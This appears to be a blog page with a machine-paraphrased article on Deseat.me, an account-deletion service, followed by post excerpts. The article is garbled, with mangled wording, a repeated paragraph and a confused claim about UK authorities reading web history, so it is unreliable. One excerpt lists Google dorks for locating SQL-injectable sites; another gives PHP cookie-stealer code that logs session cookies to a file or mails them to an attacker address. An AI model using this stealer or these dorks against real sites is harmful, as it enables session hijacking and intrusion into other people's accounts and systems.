Skip to main content

Delete Your Online Identity All In One Click

Digital Identity
Outlined by two Swedish developers, Wille Dahlbo and Linus Unnebäck, the site says it helps you ‘Clean up your reality’ by gathering every all the records and deleting them.
On the off-chance that you ever feel like online life is getting excessively, there might be an answer.

Deseat.me permits people to delete their online impression with the click of a button.

Delete



All we need to is login with your Google account, it searches out all part of the records a client has made on the web. As Deseat.me uses the Google OAuth convention, it implies that it won’t have access to anybody’s login data, the main thing it finds are the accounts you need to delete


GOOGLE'S OAUTH PROTOCOL

OAuth is an open standard for authorization, regularly utilized as a route for 
web clients to sign into outsider sites utilizing their Microsoft, Google, 
Facebook (et cetera) accounts without uncovering their secret key

It isn’t ideal, however. Deseat might have the capacity to discover the records that are connected to a Gmail account – so any old records that were made utilizing an alternate email address won’t be cleared.

Web history information should be put away for 12 months and an aggregate of 48 public authorities, including police drives forces the UK, GCHQ, IRINN, RTI and the NHS will have the capacity to get to your online exercises.

Huge web-based social networking destinations, like Twitter and Facebook, you can very easily select the deactivation alternative.

Be that as it may, smaller newsletters and other services might not have an erase connect accessibly, so you’ll need to experience and physically figure out how to deactivate them.

Be that as it may, smaller newsletters and other services might not have an erase connect accessibly, so you’ll need to experience and physically figure out how to deactivate them.

Furthermore, it isn’t conceivable to totally eradicate yourself on the web; any photos or recordings for example that are accessible to see through a friend’s Facebook account will at present be accessible even after you have erased your own record from the web page.

Comments

Popular posts from this blog

Php And Google Dorks 2017

A Dork query, sometimes just referred to as a dork, is a search string that uses advanced search operators to find information that is not readily available on a website. Here is a list of dorks to find SQL injectable websites. Google Dorks trainers.php?id= article.php?ID= play_old.php?id= declaration_more.php?decl_id= Pageid= games.php?id= newsDetail.php?id= staff_id= historialeer.php?num= product-item.php?id= news_view.php?id= humor.php?id= communique_detail.php?id= sem.php3?id= opinions.php?id= spr.php?id= pages.php?id= chappies.php?id= prod_detail.php?id= viewphoto.php?id= view.php?id= website.php?id= hosting_info.php?id= gery.php?id= detail.php?ID= publications.php?id= Productinfo.php?id= releases.php?id= ray.php?id= produit.php?id= pop.php?id= shopping.php?id= productdetail.php?id= post.php?id= section.php?id= theme.php?id= page.php?id= shredder-categories.php?id= product_ranges_view.php?ID= shop_category.php?id= channel_id=...

Create cookie stealer in PHP? get via email

<?php     $cookie = $HTTP_GET_VARS[“cookie”];     $steal = fopen(“cookiefile.txt”, “a”);     fwrite($steal, $cookie .”\n”);     fclose($steal);     ?> $cookie = $HTTP_GET_VARS[“cookie”]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable. $steal = fopen(“cookiefile.txt”, “a”); This open the cookiefile in append mode so that we can append the stolen cookie. fwrite($steal, $cookie .”\n”); This will store the stolen cookie inside the file. fclose($steal); close the opened file. Another version: Sends cookies to the hacker mail     <?php     $cookie = $HTTP_GET_VARS[“cookie”]; mail(“hackerid@mailprovider.com”, “Stolen Cookies”, $cookie);     ?> The above code will mail the cookies to hacker mail using the PHP() mail function with subject “Stolen cookies”. Third Version <?php     function GetIP()   ...

Run python commands from a bash shell

In this post I am going to show you how you can run python commands from inside a shell. There are already a few ways of doing so Write your python code in a .py file and run "python yourfile.py" Open up IDLE shell by just typing "python" and writing your command in that shell. There is also another option of python command - $ python -c 'your_command_here'  which will run the python command you specify in quotes. However, the problem with above mentioned methods is, they are time consuming. If you want to quickly perform a list comprehension or anything equivalent in python, you have to either write a script or manually open a python interactive terminal and write your command there. I am going to show you a little tweak you can do in your shell to execute python code (or parts of it) directly from command line. It works as below - $ p '<your_python_code_here>' You type "p" followed by the python statement yo...